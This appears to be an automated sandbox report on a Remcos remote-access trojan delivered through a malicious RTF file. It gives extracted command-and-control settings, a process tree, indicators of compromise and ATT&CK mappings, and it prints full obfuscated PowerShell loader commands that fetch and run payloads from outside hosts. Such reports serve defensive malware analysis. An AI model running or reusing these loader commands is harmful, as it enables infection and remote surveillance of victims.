remcos | 2b95f8d7e77d68b4fc2f40b1c42a9da731bd9812a60c36162019063f8af24978

Analysis

max time kernel
149s
max time network
138s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
23-01-2025 16:10

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

sheisveryinterestingirlsheisverybestfirlformebestthingsshedoing_____undergoodthingsarehappeningevnte.rtf
Size

243KB
MD5

8e128f75977895f5e8767935ab792e5d
SHA1

6820bb80d79a418adecf1db8d7bf1fddf054fc4e
SHA256

2b95f8d7e77d68b4fc2f40b1c42a9da731bd9812a60c36162019063f8af24978
SHA512

d579f38026e4c10b500dabea06f1965b4446ddd0a67b01f51a813b5963173af876e557c0dffe00c667be50a47fd02635062f3924fadd08f5455787c4e5651a3f
SSDEEP

3072:GBU+1XqRJXufoJVSCOum9tkU5/YATIiQvyUS:tdJXuQJwn5gDiQvyUS

Score

10^/10

remcos remotehost defense_evasion discovery execution phishing rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

abeangana.duckdns.org:1121

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-B9B8CE
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Blocklisted process makes network request 12 IoCs

flow	pid	Process
5	1936	EQNEDT32.EXE
7	1936	EQNEDT32.EXE
9	1936	EQNEDT32.EXE
11	1936	EQNEDT32.EXE
13	1936	EQNEDT32.EXE
15	1936	EQNEDT32.EXE
17	1936	EQNEDT32.EXE
18	1936	EQNEDT32.EXE
20	1104	powershell.exe
22	788	powershell.exe
23	788	powershell.exe
24	788	powershell.exe

Evasion via Device Credential Deployment 1 IoCs

defense_evasion execution

pid	Process
1104	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
788	powershell.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 788 set thread context of 1848	788	powershell.exe	45

Detected phishing page
phishing

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CasPol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EQNEDT32.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Office loads VBA resources, possible macro or embedded object present

Launches Equation Editor 1 TTPs 1 IoCs

Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

exploit

Exploitation for Client Execution

T1203

pid	Process
1936	EQNEDT32.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2872745919-2748461613-2989606286-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
1632	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1104	powershell.exe
788	powershell.exe
788	powershell.exe
788	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1104	powershell.exe
Token: SeDebugPrivilege	788	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
1632	WINWORD.EXE
1632	WINWORD.EXE

Suspicious use of WriteProcessMemory 47 IoCs

description	pid	Process	procid_target
PID 1936 wrote to memory of 2136	1936	EQNEDT32.EXE	33
PID 1936 wrote to memory of 2136	1936	EQNEDT32.EXE	33
PID 1936 wrote to memory of 2136	1936	EQNEDT32.EXE	33
PID 1936 wrote to memory of 2136	1936	EQNEDT32.EXE	33
PID 2136 wrote to memory of 1912	2136	mshta.exe	35
PID 2136 wrote to memory of 1912	2136	mshta.exe	35
PID 2136 wrote to memory of 1912	2136	mshta.exe	35
PID 2136 wrote to memory of 1912	2136	mshta.exe	35
PID 1912 wrote to memory of 1104	1912	cmd.exe	37
PID 1912 wrote to memory of 1104	1912	cmd.exe	37
PID 1912 wrote to memory of 1104	1912	cmd.exe	37
PID 1912 wrote to memory of 1104	1912	cmd.exe	37
PID 1104 wrote to memory of 1832	1104	powershell.exe	38
PID 1104 wrote to memory of 1832	1104	powershell.exe	38
PID 1104 wrote to memory of 1832	1104	powershell.exe	38
PID 1104 wrote to memory of 1832	1104	powershell.exe	38
PID 1832 wrote to memory of 1868	1832	csc.exe	39
PID 1832 wrote to memory of 1868	1832	csc.exe	39
PID 1832 wrote to memory of 1868	1832	csc.exe	39
PID 1832 wrote to memory of 1868	1832	csc.exe	39
PID 1104 wrote to memory of 900	1104	powershell.exe	41
PID 1104 wrote to memory of 900	1104	powershell.exe	41
PID 1104 wrote to memory of 900	1104	powershell.exe	41
PID 1104 wrote to memory of 900	1104	powershell.exe	41
PID 900 wrote to memory of 788	900	WScript.exe	42
PID 900 wrote to memory of 788	900	WScript.exe	42
PID 900 wrote to memory of 788	900	WScript.exe	42
PID 900 wrote to memory of 788	900	WScript.exe	42
PID 788 wrote to memory of 2468	788	powershell.exe	44
PID 788 wrote to memory of 2468	788	powershell.exe	44
PID 788 wrote to memory of 2468	788	powershell.exe	44
PID 788 wrote to memory of 2468	788	powershell.exe	44
PID 788 wrote to memory of 1848	788	powershell.exe	45
PID 788 wrote to memory of 1848	788	powershell.exe	45
PID 788 wrote to memory of 1848	788	powershell.exe	45
PID 788 wrote to memory of 1848	788	powershell.exe	45
PID 788 wrote to memory of 1848	788	powershell.exe	45
PID 788 wrote to memory of 1848	788	powershell.exe	45
PID 788 wrote to memory of 1848	788	powershell.exe	45
PID 788 wrote to memory of 1848	788	powershell.exe	45
PID 788 wrote to memory of 1848	788	powershell.exe	45
PID 788 wrote to memory of 1848	788	powershell.exe	45
PID 788 wrote to memory of 1848	788	powershell.exe	45
PID 1632 wrote to memory of 2580	1632	WINWORD.EXE	46
PID 1632 wrote to memory of 2580	1632	WINWORD.EXE	46
PID 1632 wrote to memory of 2580	1632	WINWORD.EXE	46
PID 1632 wrote to memory of 2580	1632	WINWORD.EXE	46

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\sheisveryinterestingirlsheisverybestfirlformebestthingsshedoing_____undergoodthingsarehappeningevnte.rtf"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1632
- C:\Windows\splwow64.exe
  C:\Windows\splwow64.exe 12288
  2⤵
  PID:2580

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:1936
- C:\Windows\SysWOW64\mshta.exe
  "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\ccukissmeplsgivrmebest.hta"
  2⤵
  - System Location Discovery: System Language Discovery
  - Modifies Internet Explorer settings
  - Suspicious use of WriteProcessMemory
  PID:2136
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" "/c PowerShELL -eX bYpass -nOp -W 1 -C dEvIceCREDeNtiALDEpLoYMeNt.eXe ; IEX($(ieX('[SysTem.TEXT.ENCOdINg]'+[CHaR]58+[CHAR]0x3a+'UTF8.gEtsTRING([sYSteM.convert]'+[ChAr]0X3a+[cHAr]58+'fROmbaSe64STRING('+[chAr]34+'JDFBeDhTWjJQTDEgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQkVSREVmSU5JVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbU9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNpd0dacUh1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDd01TSG4sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkSCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT0NEZEVXcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVlUVHFEbnRtIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtRSnd1cFpDaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxQXg4U1oyUEwxOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ1LjIzOS4yOS4xMi8yMjUvbmljZWdpcmxmcm5kZ2l2ZW5tZWJlc3R0aGluZ3Nmb3JnLmdJRiIsIiRlTlY6QVBQREFUQVxuaWNlZ2lybGZybmRnaXZlbm1lYmVzbmljZWdpcmxmcm5kZ2l2ZW5tZWJlcy52YnMiLDAsMCk7c1RBUlQtc2xFZXAoMyk7aU52b0tFLUV4cFJFc3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNlZ2lybGZybmRnaXZlbm1lYmVzbmljZWdpcmxmcm5kZ2l2ZW5tZWJlcy52YnMi'+[CHAr]0X22+'))')))"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1912
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      PowerShELL -eX bYpass -nOp -W 1 -C dEvIceCREDeNtiALDEpLoYMeNt.eXe ; IEX($(ieX('[SysTem.TEXT.ENCOdINg]'+[CHaR]58+[CHAR]0x3a+'UTF8.gEtsTRING([sYSteM.convert]'+[ChAr]0X3a+[cHAr]58+'fROmbaSe64STRING('+[chAr]34+'JDFBeDhTWjJQTDEgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtdHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVtQkVSREVmSU5JVElvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJMbU9OLkRsTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNpd0dacUh1LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDd01TSG4sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkSCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT0NEZEVXcSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiTVlUVHFEbnRtIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZXNQYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtRSnd1cFpDaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQxQXg4U1oyUEwxOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTQ1LjIzOS4yOS4xMi8yMjUvbmljZWdpcmxmcm5kZ2l2ZW5tZWJlc3R0aGluZ3Nmb3JnLmdJRiIsIiRlTlY6QVBQREFUQVxuaWNlZ2lybGZybmRnaXZlbm1lYmVzbmljZWdpcmxmcm5kZ2l2ZW5tZWJlcy52YnMiLDAsMCk7c1RBUlQtc2xFZXAoMyk7aU52b0tFLUV4cFJFc3NJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxuaWNlZ2lybGZybmRnaXZlbm1lYmVzbmljZWdpcmxmcm5kZ2l2ZW5tZWJlcy52YnMi'+[CHAr]0X22+'))')))"
      4⤵
      Blocklisted process makes network request
      Evasion via Device Credential Deployment
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1104
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\y8czrlxm.cmdline"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1832
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES56E.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC56D.tmp"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1868
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\nicegirlfrndgivenmebesnicegirlfrndgivenmebes.vbs"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:900
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AcgBlAHMALgBjAGwAbwB1AGQAaQBuAGEAcgB5AC4AYwBvAG0ALwBkAGEAeAB3AHUAYQA2ADMAeQAvAGkAbQBhAGcAZQAvAHUAcABsAG8AYQBkAC8AdgAxADcAMwA3ADUANAA0ADAANgAzAC8AMQBuAGUAdwBfAGkAbQBhAGcAZQBfAG4AagBwADAAeQByAC4AagBwAGcAJwA7ACAAdAByAHkAIAB7ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABpAG0AYQBnAGUAVQByAGwAKQA7ACAAJABpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7ACAAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACAAJABlAG4AZABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAcwB0AGEAcgB0AEYAbABhAGcAKQA7ACAAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACAAaQBmACAAKAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAApACAAewAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACQAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ACAAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ACkAOwAgACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAIAAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAJABtAGUAdABoAG8AZAAgAD0AIABbAFIAdQBtAHAALgBDAGwAYQBzAHMAOQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAHMAbQBlAHQAaABvAGQAXwAyACcAKQA7ACAAJABtAGUAdABoAG8AZAAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdAEAAKAAnAHQAeAB0AC4AcwBnAG4AaQBoAHQAdABhAGUAcgBnAGgAdABpAHcAcwBnAG4AaQBoAHQAZABvAG8AZwB0AHMAZQBiAC8ANQAyADIALwAyADEALgA5ADIALgA5ADMAMgAuADUANAAxAC8ALwA6AHAAdAB0AGgAJwAsACcAZgBhAGwAcwBlACcALAAnAGYAYQBsAHMAZQAnACwAJwBmAGEAbABzAGUAJwAsACcAZgBhAGwAcwBlACcALAAnAGYAYQBsAHMAZQAnACwAJwBDAGEAcwBQAG8AbAAnACwAJwBmAGEAbABzAGUAJwApACkAOwAgAH0AIAB9ACAAYwBhAHQAYwBoACAAewAgAFcAcgBpAHQAZQAtAE8AdQB0AHAAdQB0ACAAJwBFAHIAcgBvADoAIAAkAF8AJwA7ACAAfQA=')) | Invoke-Expression"
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:788
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        7⤵
        
        PID:2468
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1848

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Exploitation for Client Execution

T1203

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
164a720c2f9d9f8a508f1a0a540c96a0

SHA1
ed2de03ade68bf009447daff959cdc628d0c1103

SHA256
21f0975713bd7c3bf08af056d22b32e0ef741d46f56e68dbd5376867a37dea0f

SHA512
a21e1cb7eab19ec36cdab1d2f02aae36d2618afbe9b414cfde1034d226548942dd386cae42dc6f5aad14d4cfedea8436adc1d75dad1b6858ba99c1b9e9d650b1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
384fdffad40b71eda6fc1764b8312e68

SHA1
d2135a132e39efdc18df22de4b274f6c14f30c74

SHA256
4928452e601f8e429b2ee9a644a8a41724fc1f2c49a4540e999ade7127da664e

SHA512
a9a2c0772419c1955f1f0813360d0a2c78479168c1343244b23eea94e4620e027cb326c49dae1f50e33fb6952f0c5865ed025620c8e2ae6d6bb5bfd649ae6fc4

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabF6CF.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES56E.tmp

Filesize
1KB

MD5
06d8fa7d064d5763be431494bc2038d8

SHA1
7b84c6bcff61d9f52729e7a96b0d74829b571297

SHA256
495a8df653e0083abaed46fe9bfbe002a73192a87b47fc73dda1e47fbece25b8

SHA512
6738931a57688569d1e1318fc68c0f314e56fbe92e99793105a7f2599407ffb473fc16bb1d6c528375ac7eac2fa6e23b48013131144c9e62b1ea2b2cceb9d58b

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarF6F1.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\y8czrlxm.dll

Filesize
3KB

MD5
e9c7aac4625b884464ee9c45a2727582

SHA1
3d7b62d86f8e152765597007f6cd945040fff21c

SHA256
4ce51f64011e93b1162e078bf9e2431c0285dee171b1e738ff260b3dc7af1ea7

SHA512
03c3e5b21d2cefcce759261038cc5032e68b7351b2dbb820a21e4ab82b267d743b8239584d3f515e015c63f3753a97b489927440324ef7c6e9042861445ad39b

Download Submit
C:\Users\Admin\AppData\Local\Temp\y8czrlxm.pdb

Filesize
7KB

MD5
0c8cb7569ba968858e3e8dbb9ffbd11a

SHA1
553a2f77d44598523768dc74acd654e61089a57d

SHA256
ea4c2a15773940e4a24c1df667e4ccaf8e2da6b525524b63cba793e2d3e9e6ea

SHA512
c8692ff085c8ec26ee3a1b78f22d8abc06145f039cbcd17aa2ce4e5becf1c108cd9bcf9b5abad16cb5b33aed6ebcb8b44f9fd616bd55d796a67cb402e849d6bd

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1VCM64E2JLOBO03IGH5S.temp

Filesize
7KB

MD5
7356b66021560c740479cf322b08f001

SHA1
6b6ffacdd3e1c1234465ca810976d8a3916b51f5

SHA256
8b5c121355c6a4c540d1c071eca5733e26b0ed20d99e6cd20c0c3b7be69ae0de

SHA512
e438a065d38e21f20f5b5e655520e7ae6bcaa30967113ca5b2932e24538d7742829b29ece3d8268d7fb9c621815dbf2f9ce3f6a28259e300a7c079cb7f0ab35a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
7474cbed81edee9f82ef5dd939059940

SHA1
76bdfe0ce40113f75003a94d970e0a1f0aace767

SHA256
136819cb280ad4453c2ac25256e9edcbb269313687ac3e75edd5053dc8ec1e99

SHA512
345946fcc44eec513ea4b8ec4a9cdc4e5fd4fec20f683957244afebd1e103ba1d456c529180d0f73420341edce1fd525cb0a474b531e77021fa090fcf0e1106d

Download Submit
C:\Users\Admin\AppData\Roaming\ccukissmeplsgivrmebest.hta

Filesize
1.2MB

MD5
24d95803236fde4ee8ebfe4671dc28fe

SHA1
677e9c8b79a59b4fa3c8eab8fd318ae31dcd5d95

SHA256
986b693f564b364a2f69261f1f825d6a26afec8db9a3aa46fd2a964e45dc2a1c

SHA512
272adc89c2eedbfd065e3fa54edcb27211db44b998f3e5479cc53c6954c0b37db16e6d2eac0977c040068da07da651f8d9adc440d97e65bbdcb53afb0c4670a0

Download Submit
C:\Users\Admin\AppData\Roaming\nicegirlfrndgivenmebesnicegirlfrndgivenmebes.vbs

Filesize
205KB

MD5
0e3b19cc6060bed0436e01fe8bc04c44

SHA1
8b99c60c35d7650ed451e3996bcccb7e9f51b7cf

SHA256
35315b1e950898c156611a9074ea43debd10d09098b855e9bfba76eef6ec3d17

SHA512
ad3267ee13123bebd28cee00cb2e128f0bf6213520378b5a45aa9d31b858f140612e2e6aee5d62be3a187af7c004de10ae1f0930e8133dc71c93f011fbde29e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC56D.tmp

Filesize
652B

MD5
9443fb3e5b29eb7b287d0db72f739277

SHA1
5ee504dbf51186ec28440cc9ec7be82d1a152ae5

SHA256
2c2943a23e3fd374207cfa9cbead1dad90b9448ca13c1e02b5d3b77a973c5d46

SHA512
30d46a2858f60f0b49e7294329282af7cba96e5c302afb190a28d4ca5c1f5a155e29533ca620a98fae4d3ebfd58a6850bce309da959b2e4b1bb74ee6e5bbc643

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\y8czrlxm.0.cs

Filesize
486B

MD5
3b886b3aeeb8599b37fc0be4fe6ae9d8

SHA1
b6d0a2488bd50c1b7f96cae0e91bdc3a083a5a7e

SHA256
b1dece05fc9ac39567b6cd75ae891827264b7d3606d5996807f1e88840e2c33e

SHA512
ecc3d89869a074e00b7dbb0c3fbe07fd534cb2a100ef6280ffc3f02f66ace38526746761b216061e5d7d519f0b685a1b89a2f51c4e24d8ee900b77b949268458

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\y8czrlxm.cmdline

Filesize
309B

MD5
ed6058f576b03cd9d00a580d70c3fdd7

SHA1
c1309fb66b024aa704b1d220457c47aad7145a70

SHA256
8710262f509ce43b3c060e6625c933107109077a961b68c904660a31663ab7a7

SHA512
027784ad048785278b82939e9989eb94cded32110659534adcaa7d843ce6d5e2f13cbd6090b47d4fc5c1577a664ced497e1b3d9369ce5608a945a7e788b6cb09

Download Submit
memory/1632-2-0x00000000716ED000-0x00000000716F8000-memory.dmp

Filesize
44KB

Download
memory/1632-0-0x000000002FFC1000-0x000000002FFC2000-memory.dmp

Filesize
4KB

Download
